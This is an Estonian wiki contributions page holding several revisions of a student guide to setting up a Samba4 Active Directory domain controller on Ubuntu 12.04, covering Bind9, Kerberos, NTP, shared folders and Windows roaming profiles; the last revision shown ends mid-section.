ICO wiki - User contributions [en]

Zentyal SAMBA4

2013-01-13T08:40:32Z

Ulihten: /* Sissejuhatus */

Autorid: Urmo Lihten A31 ja Kersti Lang A31 (2012 sügissemester)

=Sissejuhatus=
Käesolev artikkel on juhend Samba 4 paigaldamise ja seadistamise kohta.
Samba4 on failiserver, mis on siin artikli näites paigaldatud Ubuntu 12.04 Server LTS peale.
Kasutab uut Virtual File System (VFS) mis toetab Acess Control List -i (ACL). Domeeni Kontrolleri lahendus sambas sisaldab LDAP serverit (LDB) ja Kerberose võtmehaldust Kerberos Key Distribution Center (KDC). Lisaks veel sisemine Domain Name System (DNS) protokoll.
Zentyal on aga failiserveri vabavaraline serveri lahendus, mille kaudu on võimalik hallata kõiki võrguteenuseid ühelt platvormilt - võrgu turvalisus, infrastruktuur, ressursside jagamine.

=Eeldused=
* Ubuntu versioon 12.04
* IP aadress 192.168.56.200
* eelnevalt paigaldatud Bind9 domeeniga piix.ee
* elementaarsed teadmised Ubuntu käsurea kasutamisest

=Eelised=
* 'Active Directory' sisselogimise ja administreerimise protokollide tugi Windows XP, Windows 7 ja Mac OS X klientidele.
* NTFS tugi
* Sisemine LDAP server AD omadustega.
* Sisemine Kerberos server.
* AD sidumine DNS-ga.
* Python tugi
jne.

=Paigaldamine=

==Samba4 installeerimine==
Logime sisse administraatorina:
<source lang=bash>
sudo -i
</source>

Uuendame tarkvara nimekirja:
<source lang=bash>
apt-get update
</source>

Installeerime Samba4 jaoks vajalikud paketid:
<source lang=bash>
apt-get install samba4
</source>

Samba 4 installi käigus on sage viga, et Samba 4 package mängib enda staatuseks "half installed. See tuleb käsitsi muuta:
<source lang=bash>
less /var/lib/dpkg/status | grep half-configured
nano /var/lib/dpkg/status
</source>

Leia konfifailist Samba4 rida:
<source lang=bash>
Package: samba4
Status: install ok half-configured
</source>

...ning muuda see rida selliseks:
<source lang=bash>
Package: samba4
Status: install ok installed
</source>

Kontrollime, et rohkem "poolikuid" faile pole:
<source lang=bash>
less /var/lib/dpkg/status | grep half-configured
</source>

Juhul kui eksisteerib vana Samba konfiguratsiooni fail, siis kustutame või muudame backup'iks:
<source lang=bash>
mv /etc/samba/smb.conf{,.old}
</source>

==Bind9 konfiguratsiooni faili loomine==
eeldusel, et smb.conf faili pole olemas. Samuti tuleb jälgida järgnevas käsus, et --realm juures märgitud argumendiks "samba.piix.ee" kõrval tuleb --domain argumendiks kirjutada "samba.piix; millegi muu korral ei hakka Kerberos soovitult tööle.<br>
--adminpass ehk administraatori parool peab olema vähemalt ühe suure tähega ja ühe numbriga ning vähemalt 7 tähemärki pikk.<br>
<source lang=bash>
/usr/share/samba/setup/provision --realm=samba.piix.ee --domain=samba --adminpass=Student1 --server-role='dc'
</source>

Tulemus on järgnev:
<source lang=bash>
See /var/lib/samba/private/named.conf for an example configuration include file for BIND
and /var/lib/samba/private/named.txt for further documentation required for secure DNS updates
Setting up sam.ldb rootDSE marking as synchronized
Fixing provision GUIDs
A Kerberos configuration suitable for Samba 4 has been generated at /var/lib/samba/private/krb5.conf
A phpLDAPadmin configuration file suitable for administering the Samba 4 LDAP server has been created in /var/lib/samba/private/phpldapadmin-config.php .
Once the above files are installed, your Samba4 server will be ready to use
Server Role: domain controller
Hostname: ubuntu
NetBIOS Domain: SAMBA
DNS Domain: samba.piix.ee
DOMAIN SID: S-1-5-21-1025771091-2011791338-2641903939
</source>

==Test==
Käivitame Samba:
<source lang=bash>
initctl start samba4
</source>

Laeme Samba-client'i:
<source lang=bash>
apt-get install samba4-clients
</source>

eemaldame samba.pid faili, mis takistab sambat käivitamast:
<source lang=bash>
rm /var/run/samba.pid
</source>

ning kontrollime (väljund kuva share's olemad elemendid):
<source lang=bash>
root@ubuntu:~# smbclient -L localhost -U%

Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
share Disk yldine jagatud ketas
profiles Disk opilaste jagatud ketas
IPC$ IPC IPC Service
</source>

==Samba4 seonduvate skriptide muutmine ja loomine==
Kuna Samba4 ei kontrolli startimisel Samba kataloogi olemasolu /var/run kaustas, siis lisame selle võimaluse:
<source lang=bash>
nano /etc/init.d/samba4
</source>

Lisame koodile juurde SAMBAPID kontrollimise read enne esimest "else"t:
<source lang=bash>
if [ ! -d $(dirname $SAMBAPID) ];
then mkdir -p $(dirname $SAMBAPID)
fi
</source>

Lisaks tuleb luua fail /usr/local/sbin/samba:
<source lang=bash>
nano /usr/local/sbin/samba
</source>
Ning selle sisuks tuleb:
<source lang=bash>
#!/bin/sh
LD_PRELOAD=/usr/lib/libdcerpc.0.0.1 /usr/sbin/$(basename $0)
</source>

Tekitame eelnevalt loodud failidele lingid:
<source lang=bash>
ln -s /usr/local/sbin/samba{,_dnsupdate}
ln -s /usr/local/sbin/samba{,_spnupdate}
</source>erandid

Taaskäivitane Samba:
<source lang=bash>
service samba4 restart
</source>

==DNS seadistamine==
Muudame Bind9 konfiguratsiooni:
<source lang=bash>
nano /etc/bind/named.conf.local
</source>
Kaasame Samba4 raames loodud konfiratsioonifaili Bind9 seadetesse:
<source lang=bash>
include "/var/lib/samba/private/named.conf";
</source>

==Apparmor'i probleem==

Kuna Apparmor kaitseb Samba4 konfiguratsiooni Bind9 eest, siis lisame Apparmorisse erandid:
<source lang=bash>
nano /etc/apparmor.d/usr.sbin.named
</source>

Lisada lõppu ennem viimast "}" märki järgmised read:
<source lang=bash>
/var/lib/samba/private/** rkw,
/var/lib/samba/private/dns/** rkw,
/usr/lib/i386-linux-gnu/samba/bind9/** rm,
/usr/lib/i386-linux-gnu/samba/gensec/** rm,
/usr/lib/i386-linux-gnu/ldb/modules/ldb/** rm,
/usr/lib/i386-linux-gnu/samba/ldb/** rm,
</source>
´
Laeme uuesti Apparmori profiilid ja teeme Bind9'le ka restardi:
<source lang=bash>
/etc/init.d/apparmor reload
/etc/init.d/bind9 restart
</source>

==Nimeserveri seadistamine==
Kuna Samba4 kasutab Bind9 DNS lahendust, siis oleks mõistlik lisada oma /etc/resolv.conf'i oma nimeserver kui seda juba seal pole:
<source lang=bash>
nano /etc/resolv.conf
</source>
Meie nimeserveri aadress on 192.168.56.200 (kirje tuleb lisada teistest ip-aadressidest ettepoole, et süsteem pöörduks just Bind9 poole):
<source lang=bash>
name server 192.168.56.200
</source>

==Kerberose paigaldamine/seadistamine==

Tõstame Samba4 poolt loodud spetsiaalse Kerberos5 konfiguratsioonifaili kausta /etc/:
<source lang=bash>
cp /var/lib/samba/private/krb5.conf /etc/
</source>

Kuna Kerberos on vaikimisi olemas Samba4 installimisega, siis oleks vaja selle töökorda ja seadistusi kontrollida: <br>
Paigaldame krb5-user paketi:
<source lang=bash>
apt-get install krb5-user
</source>

Paigaldamise käigus küsib ta realm'i. Meie näite puhul on selleks "samba.piix.ee".
<br>

Muudame Kerberose konfifaili /etc/krb5.conf selliseks:
<source lang=bash>
[libdefaults]
default_realm = samba.piix.ee
dns_lookup_realm = true
dns_lookup_kdc = true
</source>

==Network Time Protocol==
Kuna Samba annab domeeni liikmetele ka kellaajad kätte, siis soovime, et ka serveril endal oleks õige kellaaeg ja seda saame teha järgnevalt:
<br>
Paigaldame NTP
<source lang=bash>
apt-get install ntp
</source>
Seadistame ära muutes /etc/ntp.conf faili, lisades serverite nimekirja esimeseks:
<source lang=bash>
server 2.ee.pool.ntp.org
</source>
Teeme esimese aja pärimise ja paneme teenuse tööle:
<source lang=bash>
service ntp stop
ntpdate -B 2.ee.pool.ntp.org
service ntp start
</source>
Kontrollime, kas töötab:
<source lang=bash>
ntpq -p
</source>

=='Kontroll'==

Kontrollime, Samba4 töökorda:
<source lang=bash>
root@ubuntu:~# smbclient -L samba.piix.ee -U%

Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
share Disk yldine jagatud ketas
profiles Disk opilaste jagatud ketas
IPC$ IPC IPC Service

</source>
kuvati väljajagatud failide/kausta/printerite nimekiri.
<br>

Autentimise kontrollimiseks käivitame käsu:
<source lang=bash>
smbclient //samba.piix.ee/netlogon -UAdministrator%'Student1' -c 'ls'
</source>

Väljundiks kuvatakse netlogon kausta sisu.<br>
<br>

Kontrollime, kas Kerberos server töötab. Meie näite puhul on admin parooliks "Student1":
<source lang=bash>
root@ubuntu:~# kinit Administrator@SAMBA.PIIX.EE
Password for Administrator@SAMBA.PIIX.EE:
Warning: Your password will expire in 41 days on Sun Feb 24 00:36:33 2013
</source>

Kontrollime, kas Kerberos annab välja pileti ehk Ticketi:
<source lang=bash>
root@ubuntu:~# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: Administrator@SAMBA.PIIX.EE

Valid starting Expires Service principal
13/01/2013 09:26 13/01/2013 19:26 krbtgt/SAMBA.PIIX.EE@SAMBA.PIIX.EE
renew until 14/01/2013 09:26
</source>

=Kasutajate ja gruppide ning jagatavate kaustade loomine=
Loome kaustad "share" ja "opilane":
<source lang=bash>
mkdir -p /var/data/share
mkdir -p /var/data/profiles
</source>
Loome ka vastavad kasutajad ja grupid:
<source lang=bash>
adduser share
adduser opilane
addgroup jagatud
addgroup opilane
adduser share jagatud
adduser opilane opilane
samba-tool user add share
samba-tool user add opilane
</source>
Anname kaustadele ka vastavad omanikud ning grupid:
<source lang=bash>
chown share:jagatud /var/data/share
chown opilane:opilane /var/data/profiles
</source>

=Loodud kaustade väljajagamine ja õiguste määramised=
Avame Samba4 konfiguratsioonifaili smb.conf:
<source lang=bash>
nano /etc/samba/smb.conf
</source>
Lisame lõppu järgmised read:
<source lang=bash>
[share]
path = /var/data/share
comment = yldine jagatud ketas
read only = No

[profiles]
path = /var/data/profiles
comment = opilaste jagatud ketas
read only = no
</source>
Et kaustad välja jagada, teeme Samba4'le restardi:
<source lang=bash>
service samba4 restart
</source>
Kuna Samba4's enam ei saa smb.conf'i faili kaudu kaustadele õigusi lisada. Active Directory kaudu läbi Windowsi masina saab Administraatori kontoga teha "profiles" kaustade alla igale kasutajale oma kausta ehk "roaming profile"-i.<br>
Tuleb meeles pidada, et roaming profile's tuleb domeenis sisse logida sama Windows-versiooni masinaga. Erinevate Windowsite alt sisse logides samas domeenis genereeritakse Profiles kausta topelt kasutaja kaust nign see pole esimese loodud kasutaja kaustaga ühenduses.<br>
<br>
Windowsi keskkonnas Active Directory haldamiseks tuleb kasutada Remote Server Administration Tool'i, mis tuleb microsoft'i kodulehelt allatõmmata.<br>
Kuna meil on hetkel Windows XP kasutusel, siis meil on vaja Administration Tool Packi - http://www.microsoft.com/en-us/download/details.aspx?id=16770 .<br>
See järel liita masin loodud domeeniga:
Esmalt määrata oma võrguühenduse seadetes DNS serveriks 192.168.56.220.
<br><br>
Parem klõps My Computeril -> Properties.<br>
Uues aknas ülevalt "Computer name" ja nupp "Change"<br>
Määrata domeeniks "samba.piix.ee" või see, mis sai domeeni loomisel pantud.<br>
Edukal leidmisel küsib kasutajanime ja parooli. Tuleb panna kasutajaks Administrator ja parooliks Student1.<br>
Kui aksepteerib, siis tervitab sind domeeni liitmise puhul ja palub restarti ning peale seda saab juba domeeni sisselogida Sambas loodud kasutajatega.<br>
<br>
Windowsi klientmasinas, kuhu on installeeritud vastav Administraton Tool Pack Active Directory haldamiseks domeeniserveris, tuleb avada Start -> Run -> dsa.msc <br>
[[File:Step1.png|thumb|none|427px|dsa.msc]]
<br>

Avanenud aknas minna vastavate kasutajate juurde, avada parema klõpsuga Properties ja Profile sektsiooni ning lisada Profile Path: //192.168.56.200/profiles/%USERNAME%<br>
[[File:Step2.png|thumb|none|551px|Profile path]]

ning muudatused ära salvestada. Seejärel tuleks käivitada Start -> Run'is käsk "gpudate /force", mis sunnib uuendama Group Policy't.<br>
[[File:Step3.png|thumb|none|427px|gpupdate]] <br>

Peale seda vastava kasutajaga uuesti sisse sisselogides tehakse Profiles kausta vastava kasutajanimega kaust.
Näide serverist vaadatuna:
<source lang=bash>
# cd /var/data/profiles
# ls -l
drwxr-xr-x 12 3000012 users 4096 Aug 2 15:35 test
</source>

=Kasutatud kirjandus=
* https://wiki.itcollege.ee/index.php/Samba4_installeerimine
* http://www.matrix44.net/cms/notes/gnulinux/samba-4-ad-domain-with-ubuntu-12-04
* http://www.golinuxhub.com/2012/08/create-roaming-profiles-in-samba4.html
* http://www.pool.ntp.org/zone/ee

Zentyal SAMBA4

2013-01-13T07:00:19Z

Ulihten: /* Kasutatud kirjandus */

Autorid: Urmo Lihten A31 ja Kersti Lang A31 (2012 sügissemester)

=Sissejuhatus=
Käesolev artikkel on juhend Samba 4 paigaldamise ja seadistamise kohta.

=Eeldused=
* Ubuntu versioon 12.04
* IP aadress 192.168.56.200
* eelnevalt paigaldatud Bind9 domeeniga piix.ee
* elementaarsed teadmised Ubuntu käsurea kasutamisest

=Eelised=
* 'Active Directory' sisselogimise ja administreerimise protokollide tugi Windows XP, Windows 7 ja Mac OS X klientidele.
* NTFS tugi
* Sisemine LDAP server AD omadustega.
* Sisemine Kerberos server.
* AD sidumine DNS-ga.
* Python tugi
jne.

=Paigaldamine=

==Samba4 installeerimine==
Logime sisse administraatorina:
<source lang=bash>
sudo -i
</source>

Uuendame tarkvara nimekirja:
<source lang=bash>
apt-get update
</source>

Installeerime Samba4 jaoks vajalikud paketid:
<source lang=bash>
apt-get install samba4
</source>

Samba 4 installi käigus on sage viga, et Samba 4 package mängib enda staatuseks "half installed. See tuleb käsitsi muuta:
<source lang=bash>
less /var/lib/dpkg/status | grep half-configured
nano /var/lib/dpkg/status
</source>

Leia konfifailist Samba4 rida:
<source lang=bash>
Package: samba4
Status: install ok half-configured
</source>

...ning muuda see rida selliseks:
<source lang=bash>
Package: samba4
Status: install ok installed
</source>

Kontrollime, et rohkem "poolikuid" faile pole:
<source lang=bash>
less /var/lib/dpkg/status | grep half-configured
</source>

Juhul kui eksisteerib vana Samba konfiguratsiooni fail, siis kustutame või muudame backup'iks:
<source lang=bash>
mv /etc/samba/smb.conf{,.old}
</source>

==Bind9 konfiguratsiooni faili loomine==
eeldusel, et smb.conf faili pole olemas. Samuti tuleb jälgida järgnevas käsus, et --realm juures märgitud argumendiks "samba.piix.ee" kõrval tuleb --domain argumendiks kirjutada "samba.piix; millegi muu korral ei hakka Kerberos soovitult tööle.<br>
--adminpass ehk administraatori parool peab olema vähemalt ühe suure tähega ja ühe numbriga ning vähemalt 7 tähemärki pikk.<br>
<source lang=bash>
/usr/share/samba/setup/provision --realm=samba.piix.ee --domain=samba --adminpass=Student1 --server-role='dc'
</source>

Tulemus on järgnev:
<source lang=bash>
See /var/lib/samba/private/named.conf for an example configuration include file for BIND
and /var/lib/samba/private/named.txt for further documentation required for secure DNS updates
Setting up sam.ldb rootDSE marking as synchronized
Fixing provision GUIDs
A Kerberos configuration suitable for Samba 4 has been generated at /var/lib/samba/private/krb5.conf
A phpLDAPadmin configuration file suitable for administering the Samba 4 LDAP server has been created in /var/lib/samba/private/phpldapadmin-config.php .
Once the above files are installed, your Samba4 server will be ready to use
Server Role: domain controller
Hostname: ubuntu
NetBIOS Domain: SAMBA
DNS Domain: samba.piix.ee
DOMAIN SID: S-1-5-21-1025771091-2011791338-2641903939
</source>

==Test==
Käivitame Samba:
<source lang=bash>
initctl start samba4
</source>

Laeme Samba-client'i:
<source lang=bash>
apt-get install samba4-clients
</source>

eemaldame samba.pid faili, mis takistab sambat käivitamast:
<source lang=bash>
rm /var/run/samba.pid
</source>

ning kontrollime (väljund kuva share's olemad elemendid):
<source lang=bash>
smbclient -L localhost -U%
</source>

Väljundiks:
<source lang=bash>
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service
</source>

==Samba4 seonduvate skriptide muutmine ja loomine==
Kuna Samba4 ei kontrolli startimisel Samba kataloogi olemasolu /var/run kaustas, siis lisame selle võimaluse:
<source lang=bash>
nano /etc/init.d/samba4
</source>

Lisame koodile juurde SAMBAPID kontrollimise read enne esimest "else"t:
<source lang=bash>
if [ ! -d $(dirname $SAMBAPID) ];
then mkdir -p $(dirname $SAMBAPID)
fi
</source>

Lisaks tuleb luua fail /usr/local/sbin/samba:
<source lang=bash>
nano /usr/local/sbin/samba
</source>
Ning selle sisuks tuleb:
<source lang=bash>
#!/bin/sh
LD_PRELOAD=/usr/lib/libdcerpc.0.0.1 /usr/sbin/$(basename $0)
</source>

Tekitame eelnevalt loodud failidele lingid:
<source lang=bash>
ln -s /usr/local/sbin/samba{,_dnsupdate}
ln -s /usr/local/sbin/samba{,_spnupdate}
</source>erandid

Taaskäivitane Samba:
<source lang=bash>
service samba4 restart
</source>

==DNS seadistamine==
Muudame Bind9 konfiguratsiooni:
<source lang=bash>
nano /etc/bind/named.conf.local
</source>
Kaasame Samba4 raames loodud konfiratsioonifaili Bind9 seadetesse:
<source lang=bash>
include "/var/lib/samba/private/named.conf";
</source>

==Apparmor'i probleem==

Kuna Apparmor kaitseb Samba4 konfiguratsiooni Bind9 eest, siis lisame Apparmorisse erandid:
<source lang=bash>
nano /etc/apparmor.d/usr.sbin.named
</source>

Lisada lõppu ennem viimast "}" märki järgmised read:
<source lang=bash>
/var/lib/samba/private/** rkw,
/var/lib/samba/private/dns/** rkw,
/usr/lib/i386-linux-gnu/samba/bind9/** rm,
/usr/lib/i386-linux-gnu/samba/gensec/** rm,
/usr/lib/i386-linux-gnu/ldb/modules/ldb/** rm,
/usr/lib/i386-linux-gnu/samba/ldb/** rm,
</source>
´
Laeme uuesti Apparmori profiilid ja teeme Bind9'le ka restardi:
<source lang=bash>
/etc/init.d/apparmor reload
/etc/init.d/bind9 restart
</source>

==Nimeserveri seadistamine==
Kuna Samba4 kasutab Bind9 DNS lahendust, siis oleks mõistlik lisada oma /etc/resolv.conf'i oma nimeserver kui seda juba seal pole:
<source lang=bash>
nano /etc/resolv.conf
</source>
Meie nimeserveri aadress on 192.168.56.200 (kirje tuleb lisada teistest ip-aadressidest ettepoole, et süsteem pöörduks just Bind9 poole):
<source lang=bash>
name server 192.168.56.200
</source>

==Kerberose paigaldamine/seadistamine==

Tõstame Samba4 poolt loodud spetsiaalse Kerberos5 konfiguratsioonifaili kausta /etc/:
<source lang=bash>
cp /var/lib/samba/private/krb5.conf /etc/
</source>

Kuna Kerberos on vaikimisi olemas Samba4 installimisega, siis oleks vaja selle töökorda ja seadistusi kontrollida: <br>
Paigaldame krb5-user paketi:
<source lang=bash>
apt-get install krb5-user
</source>

Paigaldamise käigus küsib ta realm'i. Meie näite puhul on selleks "samba.piix.ee".
<br>

Muudame Kerberose konfifaili /etc/krb5.conf selliseks:
<source lang=bash>
[libdefaults]
default_realm = samba.piix.ee
dns_lookup_realm = true
dns_lookup_kdc = true
</source>

==Network Time Protocol==
Kuna Samba annab domeeni liikmetele ka kellaajad kätte, siis soovime, et ka serveril endal oleks õige kellaaeg ja seda saame teha järgnevalt:
<br>
Paigaldame NTP
<source lang=bash>
apt-get install ntp
</source>
Seadistame ära muutes /etc/ntp.conf faili, lisades serverite nimekirja esimeseks:
<source lang=bash>
server 2.ee.pool.ntp.org
</source>
Teeme esimese aja pärimise ja paneme teenuse tööle:
<source lang=bash>
service ntp stop
ntpdate -B 2.ee.pool.ntp.org
service ntp start
</source>
Kontrollime, kas töötab:
<source lang=bash>
ntpq -p
</source>

=='Kontroll'==
Kontrollime, Samba4 töökorda:
<source lang=bash>
smbclient -L samba.piix.ee -U%
</source>
Väljund kuvatakse väljajagatud failide/kausta/printerite nimekiri:
<source lang=bash>

Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service

</source>
Autentimise kontrollimiseks käivitame käsu:
<source lang=bash>
smbclient //samba.piix.ee/netlogon -UAdministrator%'Student1' -c 'ls'
</source>
Väljundiks kuvatakse netlogon kausta sisu.<br>
<br>
Kontrollime, kas Kerberos server töötab. Küsitakse admin parooli ("Student1"):
<source lang=bash>
kinit Administrator@samba.piix.ee
</source>
Töökorras olekus väljundit ei kuvata.<br>
Kontrollime, kas Kerberos annab välja pileti ehk Ticketi:
<source lang=bash>
klist
</source>
Tulemuks kuvatakse:
<source lang=bash>
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: Administrator@samba.piix.ee

Valid starting Expires Service principal
01/07/13 23:51:12 01/08/13 09:51:12 krbtgt/samba.piix.ee@samba.piix.ee
renew until 01/08/13 23:51:09

</source>
<br>

=Kasutajate ja gruppide ning jagatavate kaustade loomine=
Loome kaustad "share" ja "opilane":
<source lang=bash>
mkdir -p /var/data/share
mkdir -p /var/data/profiles
</source>
Loome ka vastavad kasutajad ja grupid:
<source lang=bash>
adduser share
adduser opilane
addgroup jagatud
addgroup opilane
adduser share jagatud
adduser opilane opilane
samba-tool user add share
samba-tool user add opilane
</source>
Anname kaustadele ka vastavad omanikud ning grupid:
<source lang=bash>
chown share:jagatud /var/data/share
chown opilane:opilane /var/data/profiles
</source>

=Loodud kaustade väljajagamine ja õiguste määramised=
Avame Samba4 konfiguratsioonifaili smb.conf:
<source lang=bash>
nano /etc/samba/smb.conf
</source>
Lisame lõppu järgmised read:
<source lang=bash>
[share]
path = /var/data/share
comment = yldine jagatud ketas
read only = No

[profiles]
path = /var/data/profiles
comment = opilaste jagatud ketas
read only = no
</source>
Et kaustad välja jagada, teeme Samba4'le restardi:
<source lang=bash>
service samba4 restart
</source>
Kuna Samba4's enam ei saa smb.conf'i faili kaudu kaustadele õigusi lisada. Active Directory kaudu läbi Windowsi masina saab Administraatori kontoga teha "profiles" kaustade alla igale kasutajale oma kausta ehk "roaming profile"-i.<br>
Tuleb meeles pidada, et roaming profile's tuleb domeenis sisse logida sama Windows-versiooni masinaga. Erinevate Windowsite alt sisse logides samas domeenis genereeritakse Profiles kausta topelt kasutaja kaust nign see pole esimese loodud kasutaja kaustaga ühenduses.<br>
<br>
Windowsi keskkonnas Active Directory haldamiseks tuleb kasutada Remote Server Administration Tool'i, mis tuleb microsoft'i kodulehelt allatõmmata.<br>
Kuna meil on hetkel Windows XP kasutusel, siis meil on vaja Administration Tool Packi - http://www.microsoft.com/en-us/download/details.aspx?id=16770 .<br>
See järel liita masin loodud domeeniga:
Esmalt määrata oma võrguühenduse seadetes DNS serveriks 192.168.56.220.
<br><br>
Parem klõps My Computeril -> Properties.<br>
Uues aknas ülevalt "Computer name" ja nupp "Change"<br>
Määrata domeeniks "samba.piix.ee" või see, mis sai domeeni loomisel pantud.<br>
Edukal leidmisel küsib kasutajanime ja parooli. Tuleb panna kasutajaks Administrator ja parooliks Student1.<br>
Kui aksepteerib, siis tervitab sind domeeni liitmise puhul ja palub restarti ning peale seda saab juba domeeni sisselogida Sambas loodud kasutajatega.<br>
<br>
Windowsi klientmasinas, kuhu on installeeritud vastav Administraton Tool Pack Active Directory haldamiseks domeeniserveris, tuleb avada Start -> Run -> dsa.msc <br>
[[File:Step1.png|thumb|none|427px|dsa.msc]]
<br>

Avanenud aknas minna vastavate kasutajate juurde, avada parema klõpsuga Properties ja Profile sektsiooni ning lisada Profile Path: //192.168.56.200/profiles/%USERNAME%<br>
[[File:Step2.png|thumb|none|551px|Profile path]]

ning muudatused ära salvestada. Seejärel tuleks käivitada Start -> Run'is käsk "gpudate /force", mis sunnib uuendama Group Policy't.<br>
[[File:Step3.png|thumb|none|427px|gpupdate]] <br>

Peale seda vastava kasutajaga uuesti sisse sisselogides tehakse Profiles kausta vastava kasutajanimega kaust.
Näide serverist vaadatuna:
<source lang=bash>
# cd /var/data/profiles
# ls -l
drwxr-xr-x 12 3000012 users 4096 Aug 2 15:35 test
</source>

=Kasutatud kirjandus=
* https://wiki.itcollege.ee/index.php/Samba4_installeerimine
* http://www.matrix44.net/cms/notes/gnulinux/samba-4-ad-domain-with-ubuntu-12-04
* http://www.golinuxhub.com/2012/08/create-roaming-profiles-in-samba4.html
* http://www.pool.ntp.org/zone/ee

Zentyal SAMBA4

2013-01-13T06:49:39Z

Ulihten: /* Loodud kaustade väljajagamine ja õiguste määramised */

Zentyal SAMBA4

2013-01-13T06:34:35Z

Ulihten: /* Kerberose paigaldamine/seadistamine */

Autorid: Urmo Lihten A31 ja Kersti Lang A31 (2012 sügissemester)

=Sissejuhatus=
Käesolev artikkel on juhend Samba 4 paigaldamise ja seadistamise kohta.

=Eeldused=
* Ubuntu versioon 12.04
* IP aadress 192.168.56.200
* eelnevalt paigaldatud Bind9 domeeniga piix.ee
* elementaarsed teadmised Ubuntu käsurea kasutamisest

=Eelised=
* 'Active Directory' sisselogimise ja administreerimise protokollide tugi Windows XP, Windows 7 ja Mac OS X klientidele.
* NTFS tugi
* Sisemine LDAP server AD omadustega.
* Sisemine Kerberos server.
* AD sidumine DNS-ga.
* Python tugi
jne.

=Paigaldamine=

==Samba4 installeerimine==
Logime sisse administraatorina:
<source lang=bash>
sudo -i
</source>

Uuendame tarkvara nimekirja:
<source lang=bash>
apt-get update
</source>

Installeerime Samba4 jaoks vajalikud paketid:
<source lang=bash>
apt-get install samba4
</source>

Samba 4 installi käigus on sage viga, et Samba 4 package mängib enda staatuseks "half installed. See tuleb käsitsi muuta:
<source lang=bash>
less /var/lib/dpkg/status | grep half-configured
nano /var/lib/dpkg/status
</source>

Leia konfifailist Samba4 rida:
<source lang=bash>
Package: samba4
Status: install ok half-configured
</source>

...ning muuda see rida selliseks:
<source lang=bash>
Package: samba4
Status: install ok installed
</source>

Kontrollime, et rohkem "poolikuid" faile pole:
<source lang=bash>
less /var/lib/dpkg/status | grep half-configured
</source>

Juhul kui eksisteerib vana Samba konfiguratsiooni fail, siis kustutame või muudame backup'iks:
<source lang=bash>
mv /etc/samba/smb.conf{,.old}
</source>

==Bind9 konfiguratsiooni faili loomine==
eeldusel, et smb.conf faili pole olemas. Samuti tuleb jälgida järgnevas käsus, et --realm juures märgitud argumendiks "samba.piix.ee" kõrval tuleb --domain argumendiks kirjutada "samba.piix; millegi muu korral ei hakka Kerberos soovitult tööle.<br>
--adminpass ehk administraatori parool peab olema vähemalt ühe suure tähega ja ühe numbriga ning vähemalt 7 tähemärki pikk.<br>
<source lang=bash>
/usr/share/samba/setup/provision --realm=samba.piix.ee --domain=samba --adminpass=Student1 --server-role='dc'
</source>

Tulemus on järgnev:
<source lang=bash>
See /var/lib/samba/private/named.conf for an example configuration include file for BIND
and /var/lib/samba/private/named.txt for further documentation required for secure DNS updates
Setting up sam.ldb rootDSE marking as synchronized
Fixing provision GUIDs
A Kerberos configuration suitable for Samba 4 has been generated at /var/lib/samba/private/krb5.conf
A phpLDAPadmin configuration file suitable for administering the Samba 4 LDAP server has been created in /var/lib/samba/private/phpldapadmin-config.php .
Once the above files are installed, your Samba4 server will be ready to use
Server Role: domain controller
Hostname: ubuntu
NetBIOS Domain: SAMBA
DNS Domain: samba.piix.ee
DOMAIN SID: S-1-5-21-1025771091-2011791338-2641903939
</source>

==Test==
Käivitame Samba:
<source lang=bash>
initctl start samba4
</source>

Laeme Samba-client'i:
<source lang=bash>
apt-get install samba4-clients
</source>

eemaldame samba.pid faili, mis takistab sambat käivitamast:
<source lang=bash>
rm /var/run/samba.pid
</source>

ning kontrollime (väljund kuva share's olemad elemendid):
<source lang=bash>
smbclient -L localhost -U%
</source>

Väljundiks:
<source lang=bash>
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service
</source>

==Samba4 seonduvate skriptide muutmine ja loomine==
Kuna Samba4 ei kontrolli startimisel Samba kataloogi olemasolu /var/run kaustas, siis lisame selle võimaluse:
<source lang=bash>
nano /etc/init.d/samba4
</source>

Lisame koodile juurde SAMBAPID kontrollimise read enne esimest "else"t:
<source lang=bash>
if [ ! -d $(dirname $SAMBAPID) ];
then mkdir -p $(dirname $SAMBAPID)
fi
</source>

Lisaks tuleb luua fail /usr/local/sbin/samba:
<source lang=bash>
nano /usr/local/sbin/samba
</source>
Ning selle sisuks tuleb:
<source lang=bash>
#!/bin/sh
LD_PRELOAD=/usr/lib/libdcerpc.0.0.1 /usr/sbin/$(basename $0)
</source>

Tekitame eelnevalt loodud failidele lingid:
<source lang=bash>
ln -s /usr/local/sbin/samba{,_dnsupdate}
ln -s /usr/local/sbin/samba{,_spnupdate}
</source>erandid

Taaskäivitane Samba:
<source lang=bash>
service samba4 restart
</source>

==DNS seadistamine==
Muudame Bind9 konfiguratsiooni:
<source lang=bash>
nano /etc/bind/named.conf.local
</source>
Kaasame Samba4 raames loodud konfiratsioonifaili Bind9 seadetesse:
<source lang=bash>
include "/var/lib/samba/private/named.conf";
</source>

==Apparmor'i probleem==

Kuna Apparmor kaitseb Samba4 konfiguratsiooni Bind9 eest, siis lisame Apparmorisse erandid:
<source lang=bash>
nano /etc/apparmor.d/usr.sbin.named
</source>

Lisada lõppu ennem viimast "}" märki järgmised read:
<source lang=bash>
/var/lib/samba/private/** rkw,
/var/lib/samba/private/dns/** rkw,
/usr/lib/i386-linux-gnu/samba/bind9/** rm,
/usr/lib/i386-linux-gnu/samba/gensec/** rm,
/usr/lib/i386-linux-gnu/ldb/modules/ldb/** rm,
/usr/lib/i386-linux-gnu/samba/ldb/** rm,
</source>
´
Laeme uuesti Apparmori profiilid ja teeme Bind9'le ka restardi:
<source lang=bash>
/etc/init.d/apparmor reload
/etc/init.d/bind9 restart
</source>

==Nimeserveri seadistamine==
Kuna Samba4 kasutab Bind9 DNS lahendust, siis oleks mõistlik lisada oma /etc/resolv.conf'i oma nimeserver kui seda juba seal pole:
<source lang=bash>
nano /etc/resolv.conf
</source>
Meie nimeserveri aadress on 192.168.56.200 (kirje tuleb lisada teistest ip-aadressidest ettepoole, et süsteem pöörduks just Bind9 poole):
<source lang=bash>
name server 192.168.56.200
</source>

==Kerberose paigaldamine/seadistamine==

Tõstame Samba4 poolt loodud spetsiaalse Kerberos5 konfiguratsioonifaili kausta /etc/:
<source lang=bash>
